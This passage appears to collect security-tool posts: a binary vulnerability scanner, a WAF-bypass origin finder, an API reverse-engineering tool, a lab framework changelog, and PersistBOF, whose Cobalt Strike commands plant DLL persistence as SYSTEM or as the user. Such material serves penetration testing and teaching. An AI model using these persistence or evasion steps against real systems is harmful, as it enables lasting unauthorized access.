If TCP connections to internal systems are allowed simply launch the socks command and access the allowed IPs via a browser and set the socks proxy to 127.0.0.1:1080. You can try out 127.0.0.1:443 and other ips to find management interfaces.



BinAbsInspector - Vulnerability Scanner For Binaries


BinAbsInspector (Binary Abstract Inspector) is a static analyzer for automated reverse engineering and scanning vulnerabilities in binaries, which is a long-term research project incubated at Keenlab. It is based on abstract interpretation with the support from Ghidra. It works on Ghidra's Pcode instead of assembly. Currently it supports binaries on x86,x64, armv7 and aarch64.


Installation

  • Install Ghidra according to Ghidra's documentation
  • Install Z3 (tested version: 4.8.15)
  • Note that generally there are two parts for Z3 library: one is Java package, the other one is native library. The Java package is already included in "/lib" directory, but we suggest that you replace it with your own Java package for version compatibility.
    • For Windows, download a pre-built package from here, extract the zip file and add a PATH environment variable pointing to z3-${version}-win/bin
    • For Linux, install with package manager is NOT recommended, there are two options:
      1. You can download suitable pre-build package from here, extract the zip file and copy z3-${version}-win/bin/*.so to /usr/local/lib/
      2. or you can build and install z3 according to Building Z3 using make and GCC/Clang
    • For MacOS, it is similar to Linux.
  • Download the extension zip file from release page
  • Install the extension according to Ghidra Extension Notes

Building

Build the extension by yourself, if you want to develop a new feature, please refer to development guide.

  • Install Ghidra and Z3
  • Install Gradle 7.x (tested version: 7.4)
  • Pull the repository
  • Run gradle buildExtension under repository root
  • The extension will be generated at dist/${GhidraVersion}_${date}_BinAbsInspector.zip

Usage

You can run BinAbsInspector in headless mode, GUI mode, or with docker.

  • With Ghidra headless mode.
$GHIDRA_INSTALL_DIR/support/analyzeHeadless <projectPath> <projectName> -import <file> -postScript BinAbsInspector "@@<scriptParams>"

<projectPath> -- Ghidra project path.
<projectName> -- Ghidra project name.
<scriptParams> -- The argument for our analyzer, provides following options:

Parameter Description
[-K <kElement>] KSet size limit K
[-callStringK <callStringMaxLen>] Call string maximum length K
[-Z3Timeout <timeout>] Z3 timeout
[-timeout <timeout>] Analysis timeout
[-entry <address>] Entry address
[-externalMap <file>] External function model config
[-json] Output in json format
[-disableZ3] Disable Z3
[-all] Enable all checkers
[-debug] Enable debugging log output
[-check "<cweNo1>[;<cweNo2>...]"] Enable specific checkers
  • With Ghidra GUI

    1. Run Ghidra and import the target binary into a project
    2. Analyze the binary with default settings
    3. When the analysis is done, open Window -> Script Manager and find BinAbsInspector.java
    4. Double-click on BinAbsInspector.java entry, set the parameters in configuration window and click OK
    5. When the analysis is done, you can see the CWE reports in console window, double-click the addresses from the report can jump to corresponding address
  • With Docker

git clone git@github.com:KeenSecurityLab/BinAbsInspector.git
cd BinAbsInspector
docker build . -t bai
docker run -v $(pwd):/data/workspace bai "@@<script parameters>" -import <file>

Implemented Checkers

So far BinAbsInspector supports following checkers:

  • CWE78 (OS Command Injection)
  • CWE119 (Buffer Overflow (generic case))
  • CWE125 (Buffer Overflow (Out-of-bounds Read))
  • CWE134 (Use of Externally-Controlled Format string)
  • CWE190 (Integer overflow or wraparound)
  • CWE367 (Time-of-check Time-of-use (TOCTOU))
  • CWE415 (Double free)
  • CWE416 (Use After Free)
  • CWE426 (Untrusted Search Path)
  • CWE467 (Use of sizeof() on a pointer type)
  • CWE476 (NULL Pointer Dereference)
  • CWE676 (Use of Potentially Dangerous Function)
  • CWE787 (Buffer Overflow (Out-of-bounds Write))

Project Structure

The structure of this project is as follows, please refer to technical details for more details.

β”œβ”€β”€ main
β”‚ β”œβ”€β”€ java
β”‚ β”‚ └── com
β”‚ β”‚ └── bai
β”‚ β”‚ β”œβ”€β”€ checkers checker implementatiom
β”‚ β”‚ β”œβ”€β”€ env
β”‚ β”‚ β”‚ β”œβ”€β”€ funcs function modeling
β”‚ β”‚ β”‚ β”‚ β”œβ”€β”€ externalfuncs external function modeling
β”‚ β”‚ β”‚ β”‚ └── stdfuncs cpp std modeling
β”‚ β”‚ β”‚ └── region memory modeling
β”‚ β”‚ β”œβ”€β”€ solver analyze core and grpah module
β”‚ β”‚ └── util utilities
β”‚ └── resources
└── test

You can also build the javadoc with gradle javadoc, the API documentation will be generated in ./build/docs/javadoc.

Acknowledgement

We employ Ghidra as our foundation and frequently leverage JImmutable Collections for better performance.
Here we would like to thank them for their great help!



Hakoriginfinder - Tool For Discovering The Origin Host Behind A Reverse Proxy. Useful For Bypassing Cloud WAFs!


Tool for discovering the origin host behind a reverse proxy. Useful for bypassing WAFs and other reverse proxies.

How does it work?

This tool will first make a HTTP request to the hostname that you provide and store the response, then it will make a request to every IP address that you provide via HTTP (80) and HTTPS (443), with the Host header set to the original host. Each HTTP response is then compared to the original using the Levenshtein algorithm to determine similarity. If the response is similar, it will be deemed a match.


Usage

Provide the list of IP addresses via stdin, and the original hostname via the -h option. For example:

prips 93.184.216.0/24 | hakoriginfinder -h example.com

You may set the Levenshtein distance threshold with -l. The lower the number, the more similar the matches need to be for it to be considered a match, the default is 5.

The number of threads may be set with -t, default is 32.

The hostname is set with -h, there is no default.

Output

The output is 3 columns, separated by spaces. The first column is either "MATCH" or "NOMATCH" depending on whether the Levenshtein threshold was reached or not. The second column is the URL being teseted, and the third column is the Levenshtein score.

Output example

hakluke$ prips 1.1.1.0/24 | hakoriginfinder -h one.one.one.one
NOMATCH http://1.1.1.0 54366
NOMATCH http://1.1.1.30 54366
NOMATCH http://1.1.1.20 54366
NOMATCH http://1.1.1.4 54366
NOMATCH http://1.1.1.11 54366
NOMATCH http://1.1.1.5 54366
NOMATCH http://1.1.1.22 54366
NOMATCH http://1.1.1.13 54366
NOMATCH http://1.1.1.10 54366
NOMATCH http://1.1.1.25 54366
NOMATCH http://1.1.1.19 54366
... snipped for brevity ...
NOMATCH http://1.1.1.251 54366
NOMATCH http://1.1.1.248 54366
MATCH http://1.1.1.1 0
NOMATCH http://1.1.1.3 19567
NOMATCH http://1.1.1.2 19517
MATCH https://1.1.1.1 0
NOMATCH https://1.1.1.3 19534
NOMATCH https://1.1.1.2 19532

Installation

Install golang, then run:

go install github.com/hakluke/hakoriginfinder@latest


Mitmproxy2Swagger - Automagically Reverse-Engineer REST APIs Via Capturing Traffic


A tool for automatically converting mitmproxy captures to OpenAPI 3.0 specifications. This means that you can automatically reverse-engineer REST APIs by just running the apps and capturing the traffic.


Installation

First you will need python3 and pip3.

$ pip install mitmproxy2swagger 
# ... or ...
$ pip3 install mitmproxy2swagger

Then clone the repo and run mitmproxy2swagger as per examples below.

Usage

Mitmproxy

To create a specification by inspecting HTTP traffic you will need to:

  1. Capture the traffic by using the mitmproxy tool. I personally recommend using mitmweb, which is a web interface built-in to mitmproxy.

    $ mitmweb
    Web server listening at http://127.0.0.1:8081/
    Proxy server listening at http://*:9999
    ...

    IMPORTANT

    To configure your client to use the proxy exposed by mitm proxy, please consult the mitmproxy documentation for more information.

  2. Save the traffic to a flow file.

    In mitmweb you can do this by using the "File" menu and selecting "Save":

  3. Run the first pass of mitmproxy2swagger:

    $ mitmproxy2swagger -i <path_to_mitmptoxy_flow> -o <path_to_output_schema> -p <api_prefix>

    Please note that you can use an existing schema, in which case the existing schema will be extended with the new data. You can also run it a few times with different flow captures, the captured data will be safely merged.

    <api_prefix> is the base url of the API you wish to reverse-engineer. You will need to obtain it by observing the requests being made in mitmproxy.

    For example if an app has made requests like these:

    https://api.example.com/v1/login
    https://api.example.com/v1/users/2
    https://api.example.com/v1/users/2/profile

    The likely prefix is https://api.example.com/v1.

  4. Running the first pass should have created a section in the schema file like this:

    x-path-templates:
    # Remove the ignore: prefix to generate an endpoint with its URL
    # Lines that are closer to the top take precedence, the matching is greedy
    - ignore:/addresses
    - ignore:/basket
    - ignore:/basket/add
    - ignore:/basket/checkouts
    - ignore:/basket/coupons/attach/{id}
    - ignore:/basket/coupons/attach/104754

    You should edit the schema file with a text editor and remove the ignore: prefix from the paths you wish to be generated. You can also adjust the parameters appearing in the paths.

  5. Run the second pass of mitmproxy2swagger:

    $ mitmproxy2swagger -i <path_to_mitmptoxy_flow> -o <path_to_output_schema> -p <api_prefix> [--examples]

    Run the command a second time (with the same schema file). It will pick up the edited lines and generate endpoint descriptions.

    Please note that mitmproxy2swagger will not overwrite existing endpoint descriptions, if you want to overwrite them, you can delete them before running the second pass.

    Passing --examples will add example data to requests and responses. Take caution when using this option, as it may add sensitive data (tokens, passwords, personal information etc.) to the schema.

HAR

  1. Capture and export the traffic from the browser DevTools.

    In the browser DevTools, go to the Network tab and click the "Export HAR" button.

  2. Continue the same way you would do with the mitmproxy dump. mitmproxy2swagger will automatically detect the HAR file and process it.

Example output

See the examples. You will find a generated schema there and an html file with the generated documentation (via redoc-cli).

See the generated html file here.



PersistBOF - Tool To Help Automate Common Persistence Mechanisms


A tool to help automate common persistence mechanisms. Currently supports Print Monitor (SYSTEM), Time Provider (Network Service), Start folder shortcut hijacking (User), and Junction Folder (User)


Usage

Clone, run make, add .cna to Cobalt Strike client.

run: help persist-ice in CS console

Syntax:

  • persist-ice [PrintMon, TimeProv, Shortcut, Junction] [persist or clean] [key/folder name] [dll / lnk exe name];

Technique Overview

All of these techniques rely on a Dll file to be seperately placed on disk. It is intentially not part of the BOF.

Print Monitor

The Dll MUST be on disk and in a location in PATH (Dll search order) BEFORE you run the BOF. It will fail otherwise. The Dll will immediately be loaded by spoolsv.exe as SYSTEM. This can be used to elevate from admin to SYSTEM as well as for persistence. Will execute on system startup. Must be elevated to run.

  • Demo Print Monitor Dll in project

Example:

  1. upload NotMalware.dll to C:\Windows\NotMalware.dll
  2. persist-ice PrintMon persist TotesLegitMonitor NotMalware.dll
  3. Immediately executes as SYSTEM
  4. Will execute on startup until removed
  5. persist-ice PrintMon clean TotesLegitMonitor C:\Windows\NotMalware.dll > Will delete the registery keys and unload the Dll, then attempt to delete the dll if provided the correct path. Should succeed.

Time Provider

Loaded by svchost.exe as NETWORK SERVICE (get your potatoes ready!) on startup after running the BOF. Must be elevated to run.

  • Demo Time Provider Dll in project

Example:

  • persist-ice TimeProv persist TotesLegitTimeProvider C:\anywhere\NotMalware.dll
  • persist-ice TimeProv cleanup TotesLegitTimeProvider C:\anywhere\NotMalware.dll > Will delete the registry keys and attempt to delete the dll if provided the correct path. Will probably fail because the dll is not unloaded by the process.

Junction Folder

Same technique as demonstrated in Vault 7 leaks. Executed on user login. Non-elevated. Dll will be loaded into explorer.exe

Example:

  • persist-ice Juction persist TotesLegitFolder C:\user-writable-folder\NotMalware.dll Save CLSID
  • persist-ice Juction clean TotesLegitFolder C:\user-writable-folder\NotMalware.dll 6be5e092-90cc-452d-be83-208029e259e0 > Will delete the registry keys, junction folder, and attempt to delete the dll.

Start Folder Hijack

Create a new, user writeable folder, copy a hijackable windows binary to the folder, then create a shortcut in the startup folder. Executed on user login. Non-elevated.

Example:

  • persist-ice Shortcut persist C:\TotesLegitFolder C:\Windows\System32\Dism.exe > upload your Dll as a proxy dll to dismcore.dll into C:\TotesLegitFolder
  • persist-ice Shortcut persist C:\TotesLegitFolder C:\Windows\System32\Dism.exe > Will attempt delete all files in new folder then delete the folder itself. If the Dll is still loaded in the process then this will fail.

References

https://stmxcsr.com/persistence/print-monitor.html

https://stmxcsr.com/persistence/time-provider.html

https://pentestlab.blog/2019/10/28/persistence-port-monitors/

https://blog.f-secure.com/hunting-for-junction-folder-persistence/

https://attack.mitre.org/techniques/T1547/010/

https://attack.mitre.org/techniques/T1547/003/

https://attack.mitre.org/techniques/T1547/009/



Labtainers - A Docker-based Cyber Lab Framework


Labtainers include more than 50 cyber lab exercises and tools to build your own. Import a single VM appliance or install on a Linux system and your students are done with provisioning and administrative setup, for these and future lab exercises.

  • Consistent lab execution environments and automated provisioning via Docker containers
  • Multi-component network topologies on a modestly performing laptop computer
  • Automated assessment of student lab activity and progress
  • Individualized lab exercises to discourage sharing solutions

Labtainers provide controlled and consistent execution environments in which students perform labs entirely within the confines of their computer, regardless of the Linux distribution and packages installed on the student's computer. Labtainers run on our [VM appliance][vm-appliancee], or on any Linux with Dockers installed. And Labtainers is available as cloud-based VMs, e.g., on Azure as described in the Student Guide.

See the Student Guide for installation and use, and the Instructor Guide for student assessment. Developing and customizing lab exercises is described in the Designer Guide. See the Papers for additional information about the framework. The Labtainers website, and downloads (including VM appliances with Labtainers pre-installed) are at https://nps.edu/web/c3o/labtainers.

Distribution created: 03/25/2022 09:37
Revision: v1.3.7c
Commit: 626ea075
Branch: master


Distribution and Use

Please see the licensing and distribution information in the docs/license.md file.

Guide to directories

  • scripts/labtainers-student -- the work directory for running and testing student labs. You must be in that directory to run student labs.

  • scripts/labtainers-instructor -- the work directory for running and testing automated assessment and viewing student results.

  • labs -- Files specific to each of the labs

  • setup_scripts -- scripts for installing Labtainers and Docker and updating Labtainers

  • docs -- latex source for the labdesigner.pdf, and other documentation.

  • UI -- Labtainers lab editor source code (Java).

  • headless-lite -- scripts for managing Docker Workstation and cloud instances of Labtainers (systems that do not have native X11 servers.)

  • scripts/designer -- Tools for building new labs and managing base Docker images.

  • config -- system-wide configuration settings (these are not the lab-specific configuration settings.

  • distrib -- distribution support scripts, e.g., for publishing labs to the Docker hub.

  • testsets -- Test procedures and expected results. (Per-lab drivers for SimLab are not distributed).

  • pkg-mirrors -- utility scripts for internal NPS package mirroring to reduce external package pulling during tests and distribution.

Support

Use the GitHub issue reports, or email me at mfthomps@nps.edu

Also see https://my.nps.edu/web/c3o/support1

Release notes

The standard Labtainers distribution does not include files required for development of new labs. For those, run ./update-designer.sh from the labtainer/trunk/setup_scripts directory.

The installation script and the update-designer.sh script set environment variables, so you may want to logout/login, or start a new bash shell before using Labtainers the first time.

March 23, 2022

  • Fix path to tap lock directory; was causing failure of labs using network taps
  • Update plc-traffic netmon computer to have openjfx needed for new grassmarlin in java environment
  • Speed up lab startup by avoiding chown -R, which is very slow in docker.
  • Another shot at avoiding deletion of the X11 link in container /tmp directory.
  • Fix webtrack counting of sites visited and remove live-headers goal, that tool is no longer available. Clarified some lab manual steps.

March 2, 2022

  • Add new ssh-tunnel lab (thanks GWD!)
  • Fix labedit failure to reflect X11 value set by new_lab_setup
  • Add option to not parameterize a container

February 23, 2022

  • labedit was corrupting start.config after addition of new containers
  • Incorrect path to student guide in the student README file; dynamically change for cloud configs
  • Incorrect extension to update-labtainer.sh
  • Msc guide enahancements
  • Update the ghidra lab to include version 10.1.2 of Ghidra

February 15, 2022

  • Revert Azure cloud support to provision for each student. Azure discourages sharing resources.

January 24, 2022

  • Azure cloud now uses image stored in an Azure blob instead of provisioning for each student.
  • Added support for Google Cloud.

January 19, 2022

  • Introduce Labtainers on the Azure cloud. See the Student Guide for details on how to use this.

January 3, 2022

  • Revise setuid-env lab to add better assessment; simlab testing and avoid sighup in the printenv child.
  • Fix assessment goal count directive to exclude result tag values of false.
  • Do not require labname when using gradelab -a with a grader started with the debug option.
  • Revise capinout (stdin/stdout mirroring) to handle orphaning of command process children, improved documentation and error handling.
  • Added display of progress bars of docker images being pulled when a lab is first run.
  • User feedback on progress of container initialization.
  • The pcap-lib lab was missing a notify file needed for automated assessment; Remove extraneous step from Lab Manual.

November 23, 2021

  • Disable ubuntu popup errors on test VM.
  • Fix handling of different DISPLAY variable formats.

October 22, 2021

  • Revise the tcpip lab guide to note a successful syn-flood attack is not possible. Fix its automated assessment and add SimLab scripts.
  • Change artifact file extension from zip to lab, and add a preamble to confuse GUI file managers. Students were opening the zip and submitting its guts.
  • Make the -r option to gradelab the default, add a -c option for cumulative use of grader.
  • Modify refresh_mirror to refer to the local release date to avoid frequent queries of DockerHub. Each such query counts as an image pull, and they are now trying to monetize those.

September 30, 2021

  • Change bufoverflow lab guide and grading to not expect success with ASLR turned on, assess whether it was run.
  • Error handling for web grader for cases where student lacks results.
  • Print warning when deprecated lab is run.
  • Change formatstring grading to remove unused "_leaked_secret" description and clarify value of leaked_no_scanf.
  • Also change formatstring grading to allow any name for the vulnerable executable.

September 29, 2021

  • Gradelab error handling, reduce instances of crashes due to bad zip files.
  • Limit stdout artifact files to 1MB

September 17, 2021

  • Ghidra lab guide had wrong IP address, was not remade from source.

September 14, 2021

  • Example labs for LDAP and Mariadb using SSL. Intended as templates for new labs.
  • Handle Mariadb log format
  • Add per-container parameters to limit CPU use or pin container to CPU set.
  • Labpack creation now available via a GUI (makepackui).
  • Tab completion for the labtainer, labpack and gradelab commands.
  • New parallel computing lab ``parallel'' using MPI.

August 3, 2021

  • Add a "WAIT_FOR" configuration option to cause a container to delay parameterization until another container completes its parameterization.
  • Support for Mariadb log formats in results parsing
  • Remove support for Mac and Windows use of Docker Desktop. That product is too unstable for us to support.
  • Supress stderr messages when user uses built-in bash commands such as "which".
  • Bug fixes to makepack/labpack programs.

July 19, 2021

  • Add a DNS lab to introduce the DNS protocol and configuration.
  • Revised VirtualBox appliance image to start with the correct update script.
  • Split resolv.conf nameserver parameter out of the lab_gw configuration field into its own value.
  • IModule command failed if run before any labs had been started.

July 5, 2021

  • Errors in DISPLAY env variable management broke GUI applications on Docker Desktop.

July 1, 2021

  • Support Mac package installation of headless Labtainers.
  • The routing-basics lab automated assessment failed due to lack of treataslocal files
  • Correct typos and incorrect addresses in routing-basics lab, and fix automated assessment.
  • Assessment of pcapanalysis was failing.

June 10, 2021

  • All lab manual PDFs are now in the github repo
  • Convert vpnlab and vpnlab2 instructions to PDF lab manuals.

May 25, 2021

  • Add searchable keywords to each lab. See "labtainer -h" for usage.
  • Expand routing-basics lab and lab manual
  • Remove routing-basics2 lab, it is now redundant.
  • sudo on some containers failed because hostnames remove underscores, leading to mismatch with the hosts file. Fix with extra entry in the hosts file with container name sans underscore.
  • New Labpack feature to package a collection of labs, and makepack tool to create Labpacks.
  • Error check for /sbin directory when using ubuntu20 -- would be silently fatal.
  • New network-basics lab

May 5, 2021

  • Introduce a new users lab to introduce user/group management
  • Surpress Apparmor host messages in centos container syslogs

April 28, 2021

  • New base2 images lacked man pages. Used unminimize to restore them in the base image.
  • Introduce a OSSEC host-based IDS lab.

April 13, 2021

  • CyberCIEGE lab failed because X11 socket was not relocated prior to starting Wine via fixlocal.

April 9, 2021

  • New gdb-cpp tutorial lab for using GDB on a simple C++ program.
  • Floating point exceptions were revealing use of exec_wrap.sh for stdin/stdout mirroring.

April 7, 2021

  • ldap lab failed when moved to Ubuntu 20. Problem traced to problem with nscd cache of pwd. Move ldap to Ubuntu 20

March 23, 2021

  • Parameterizing with RANDOM did not include the upper bound.
  • Add optional step parameter to RANDOM, e.g., to ensure word boundaries.
  • db-access lab: add mysql-workbench to database computer.
  • New overrun lab to illustrate memory references beyond bounds of c data structures.
  • New printf lab to introduce memory references made by the printf function.

March 19, 2021

  • gradelab ignore makdirs error, problem with Windows rmtree on shared folders.
  • gradelab handle spaces in student zip file names.
  • gradelab handle zip file names from Moodle, including build downloads.

March 12, 2021

  • labedit UI: Remove old wireshark image from list of base images.
  • labedit UI: Increase some font sizes.
  • grader web interface failed to display lab manuals if the manual name does not follow naming conventions.

March 11, 2021

  • labedit UI add registry setting in new global lab configuration panel.

March 10, 2021

  • labedit UI fixes to not build if syntax error in lab
  • labedit UI "Lab running" indicator fix to reflect current lab.

March 8, 2021

  • Deprecate use of HOST_HOME_XFER, all labs use directory per the labtainer.config file.
  • Add documentation comment to start.config for REGISTRY and BASE_REGISTRY

March 5, 2021

  • Error handling on gradelab web interface when missing results.
  • labedit addition of precheck, msc bug fixes.

February 26, 2021

  • The dmz-example lab had errors in routing and setup of dnsmasq on some components.

February 18, 2021

  • UI was rebuilding images because it was updating file times without cause
  • Clean up UI code to remove some redundant data copies.

February 14, 2021

  • Add local build option to UI
  • Create empty faux_init for centos6 bases.

February 11, 2021

  • Fix UI handling of editing files. Revise layout and eliminate unused fields.
  • Add ubuntu20 base2 base configuration along with ssh2, network2 and wireshark2
  • The new wireshark solves the prolem of black/noise windows.
  • Map /tmp/.X11-unix to /var/tmp and create a link. Needed for ubuntu20 (was deleting /tmp?) and may fix others.

February 4, 2021

  • Add SIZE option to results artifacts
  • Simplify wireshark-intro assessment and parameterization and add PDF lab manual.
  • Provide parameter list values to pregrade.sh script as environment variables
  • enable X11 on the grader
  • put update-designer.sh into users path.

January 19, 2021

  • Change management of README date/rev to update file in source repo.
  • Introduce GUI for creating/editing labs -- see labedit command.

December 21, 2020

  • The gradelab function failed when zip files were copied from a VirtualBox shared folder.
  • Update Instructor Guide to describe management of student zip files on host computers.

December 4, 2020

  • Transition distribution of tar to GitHub releaese artifacts
  • Eliminate seperate designer tar file, use git repo tarball.
  • Testing of grader web functions for analysis of student lab artifacts
  • Clear logs from full smoketest and delete grader container in removelab command.

December 1, 2020

  • The iptables2 lab assessment relied on random ports being "unknown" to nmap.
  • Use a sync diretory to delay smoketests from starting prior to lab startup.
  • Begin integrating Lab designer UI elements.

October 13, 2020

  • Headless configuraions for running on Docker Desktop on Macs & Windows
  • Headless server support, cloud-config file for cloud deployments
  • Testing support for headless configurations
  • Force mynotify to wait until rc.local runs on boot
  • Improve mynotify service ability to merge output into single timestamp
  • Python3 for stopgrade script
  • SimLab now uses docker top rather than system ps

September 26, 2020

  • Clean up the stoplab scripts to ignore non-lab containers
  • Add db-access database access control lab for controlles sharing of a mysql db.

September 17, 2020

  • The macs-hash lab was unable to run Leafpad due to the X11 setting.
  • Grader logging was being redirected to the wrong log file, now captures errors from instructor.py
  • Copy instructor.log from grader to the host logs directory if there is an error.

August 28, 2020

  • Fix install script to use python3-pip and fix broken scripts: getinfo.py and pull-all.py
  • Registry logic was broken, test systems were not using the test registry, add development documentation.
  • Add juiceshop and owasp base files for OWASP-based web security labs
  • Remove unnecessary sudos from check_nets
  • Add CHECK_OK documentation directive for automated assessment
  • Change check_nets to fix iptables and routing issues if so directed.

August 12, 2020

  • Add timeout to prestop scripts
  • Add quiz and checkwork to dmz-lab
  • Restarting the dmz-lab without -r option broke routing out of the ISP.
  • Allow multiple files for time_delim results.

August 6, 2020

  • Bug in error handling when X11 socket is missing
  • Commas in quiz questions led to parse errors
  • Add quiz and checkwork to iptables2 lab

July 28, 2020

  • Add quiz support -- these are guidance quizzes, not assessment quizzes. See the designer guide.
  • Add current-state assessment for use with the checkwork command.

July 21, 2020

  • Add testsets/bin to designer's path
  • Designer guide corrections and explainations for IModule steps.
  • Add RANGE_REGEX result type for defining time ranges using regular expressions on log entries.
  • Check that X11 socket exists if it is needed when starting a lab.
  • Add base image for mysql
  • Handle mysql log timestamp formats in results parsing.

June 15, 2020

  • New base image contianing the Bird open source router
  • Add bird-bgp Border Gateway Protocol lab.
  • Add bird-ospf Open Shortest Path First routing protocol.
  • Improve handling of DNS changes, external access from some containers was blocked in some sites.
  • Add section to Instructor Guide on using Labtainers in environments lacking Internet access.

May 21, 2020

  • Move all repositories to the Docker Hub labtainers registry
  • Support mounts defined in the start.config to allow persistent software installs
  • Change ida lab to use persistent installation of IDA -- new name is ida2
  • Add cgc lab for exploration of over 200 vulnerable services from the DARPA Cyber Grand Challenge
  • Add type_string command to SimLab
  • Add netflow lab for use of NetFlow network traffic analysis
  • Add 64-bit versions of the bufoverflow and the formatstring labs

April 9, 2020

  • Grader failed assessment of CONTAINS and FILE_REGX conditions when wildcards were used for file selection.
  • Include hints for using hexedit in the symlab lab.
  • Add hash_equal operator and hash-goals.py to automated assessment to avoid publishing expected answers in configuration files.
  • Automated assessment for the pcap-lib lab.

April 7, 2020

  • Logs have been moved to $LABTAINER_DIR/logs
  • Other cleanup to permit rebuilds and tests using Jenkins, including use of unique temporary directories for builds
  • Move build support functions out of labutils into build.py
  • Add pcap-lib lab for PCAP library based development of traffic analysis programs

March 13, 2020

  • Add plc-traffic lab for use of GrassMarlin with traffic generated during the lab.
  • Introduce ability to add "tap" containers to collect PCAPs from selected networks.
  • Update GNS3 documentation for external access to containers, and use of dummy_hcd to simulate USB drives.
  • Change kali template to use faux_init rather than attempting to use systemd.
  • Moving distributions (tar files) to box.com
  • Change SimLab use of netstat to not do a dns lookup.

February 26, 2020

  • If labtainer command does not find lab, suggest that user run update-labtainer.sh
  • Add support preliminary support for a network tap component to view all network traffic.
  • Script to fetch lab images to prep VMs that will be used without internet.
  • Provide username and password for nmap-discovery lab.

February 18, 2020

  • Inherit the DISPLAY environment variable from the host (e.g., VM) instead of assuming :0

February 14, 2020

February 11, 2020

  • Update guides to describe remote access to containers withing GNS3 environments
  • Hide selected components and links within GNS3.
  • Figures in the webtrack lab guide were not visible; typos in this and nmap-ssh

February 6, 2020

  • Introduce function to remotely manage containers, e.g., push files.
  • Add GNS3 environment function to simulate insertion of a USB drive.
  • Improve handling of Docker build errors.

February 3, 2020

  • On the metasploit lab, the postgresql service was not running on the victim.
  • Merge the IModule manual content into the Lab Designer guide.
  • More IModule support.

January 27, 2020

  • Introduce initial support for IModules (instructor-developed labs). See docs/imodules.pdf.
  • Fix broken LABTAINER_DIR env variable within update-labtainer
  • Fix access mode on accounting.txt file in ACL lab (had become rw-r-r). Use explicit chmod in fixlocal.sh.

January 14, 2020

  • Port framework and gradelab to Python3 (existing Python2 labs will not change)
    • Use backward compatible random.seed options
    • Hack non-compatable randint to return old values
    • Continue to support python2 for platforms that lack python3 (or those such as the older VM appliance that include python 3.5.2, which breaks random.seed compatability).
    • Add rebuild alias for rebuild.py that will select python2 if needed.
  • Centos-based labs manpages were failing; use mandb within base docker file
  • dmz-lab netmask for DMZ network was wrong (caught by python3); as was IP address of inner gateway in lab manual
  • ghex removed from centos labs -- no longer easily supported by centos 7
  • file-deletion lab must be completed without rebooting the VM, note this in the Lab Manual.
  • Add NO_GW switch to start.config to disable default gateways on containers.
  • Metasploit lab, crashes host VM if runs as privileged; long delays on su if systemd enabled; so run without systemd. Remove use of database from lab manual, configure to use new no_gw switch
  • Update file headers for licensing/terms; add consolidated license file.
  • Modify publish.py to default to use of test registry, use -d to force use of default_registry
  • Revise source control procedures to use different test registry for each branch, and use a premaster branch for final testing of a release.

October 9, 2019

  • Remove dnsmasq from dns component in the dmz-lab. Was causing bind to fail on some installations.

October 8, 2019

  • Syntax error in test registry setup; lab designer info on large files; fetch bigexternal.txt files

September 30, 2019

  • DockerHub registry retrieval again failing for some users. Ignore html prefix to json.

September 20, 2019

  • Assessment of onewayhash should allow hmac operations on file of student's choosing.

September 5, 2019

  • Rebuild metasploit lab, metasploit-framework exhibited a bug. And the labs "treataslocal" file was left out of the move from svn. Fix type in metasploit lab manual.

August 30, 2019

  • Revert test for existence of container directories, they do not always exist.

August 29, 2019

  • Lab image pulls from docker hub failed due to change in github or curl? Catch rediret to cloudflare. Addition of GNS3 support. Fix to dmz-lab dnssec.

July 11, 2019

  • Automated assessment for CentOS6 containers, fix for firefox memory issue, support arbitrary docker create arguments in the start.config file.

June 6, 2019

  • Introduce a Centos6 base, but not support for automated assessment yet

May 23, 2019

  • Automated assessment of setuid-env failed due to typos in field seperators.

May 8, 2019

  • Corrections to Capabilities lab manual

May 2, 2019

  • Acl lab fix to bobstuff.txt permissions. Use explicit chmod in fixlocal.sh
  • Revise student guide to clarify use of stop and -r option in body of the manual.

March 9, 2019

  • The checkwork function was reusing containers, thereby preventing students from eliminating artifacts from previous lab work.
  • Add appendix to the symkey lab to describe the BMP image format.

February 22, 2019

  • The http server failed to start in the vpn and vpn2 labs. Automated assessment removed from those labs until reworked.

January 7, 2019

  • Fix gdblesson automated assessment to at least be operational.

January 27, 2019

  • Fix lab manual for routing-basics2 and fix routing to enable external access to internal web server.

December 29, 2018

  • Fix routing-basics2, same issues as routing-basics, plus an incorret ip address in the gateway resolv.conf

December 5, 2018

  • Fix routing-basics lab, dns resolution at isp and gatway components was broken.

November 14, 2018

  • Remove /run/nologin from archive machine in backups2 -- need general solution for this nologin issue

November, 5, 2018

  • Change file-integrity lab default aid.conf to track metadata changes rather than file modification times

October 22, 2018

  • macs-hash lab resolution verydodgy.com failed on lab restart
  • Notify function failed if notify_cb.sh is missing

October 12, 2018

  • Set ulimit on file size, limit to 1G

October 10, 2018

  • Force collection of parameterized files
  • Explicitly include leafpad and ghex in centos-xtra baseline and rebuild dependent images.

September 28, 2018

  • Fix access modes of shared file in ACL lab
  • Clarify question in pass-crack
  • Modify artifact collection to ignore files older than start of lab.
  • Add quantum computing algorithms lab

September 12, 2018

  • Fix setuid-env grading syntax errors
  • Fix syntax error in iptables2 example firewall rules
  • Rebuild centos labs, move lamp derivatives to use lamp.xtr for waitparam and force httpd to wait for that to finish.

September 7, 2018

  • Add CyberCIEGE as a lab
  • read_pre.txt information display prior to pull of images, and chance to bail.

September 5, 2018

  • Restore sakai bulk download processing to gradelab function.
  • Remove unused instructor scripts.

September 4, 2018

  • Allow multiple IP addresses per network interface
  • Add base image for Wine
  • Add GRFICS virtual ICS simulation

August 23, 2018

  • Add GrassMarlin lab (ICS network discovery)

August 23, 2018

  • Add GrassMarlin lab (ICS network discovery)

August 21, 2018

  • Another fix around AWS authentication issues (DockerHub uses AWS).
  • Fix new_lab_setup.py to use git instead of svn.
  • Split plc-forensics lab into a basic lab and and advanced lab (plc-forensics-adv)

August 17, 2018

  • Transition to git & GitHub as authoritative repo.

August 15, 2018

  • Modify plc-forensics lab assessment to be more general; revise lab manual to reflect wireshark on the Labtainer.

August 15, 2018

  • Add "checkwork" command allowing students to view automated assessment results for their lab work.
  • Include logging of iptables packet drops in the iptables2 and the iptables-ics lab.
  • Remove obsolete instances of is_true and is_false from goal.config
  • Fix boolean evaluation to handle "NOT foo", it had expected more operands.

August 9, 2018

  • Support parameter replacement in results.config files
  • Add TIME_DELIM result type for results.config
  • Rework the iptables lab, remove hidden nmap commands, introduce custom service

August 7, 2018

  • Add link to student guide in labtainer-student directory
  • Add link to student guide on VM desktops
  • Fixes to iptables-ics to avoid long delay on shutdown; and fixes to regression tests
  • Add note to guides suggesting student use of VM browser to transfer artifact zip file to instructor.

August 1, 2018

  • Use a generic Docker image for automated assessment; stop creating "instructor" images per lab.

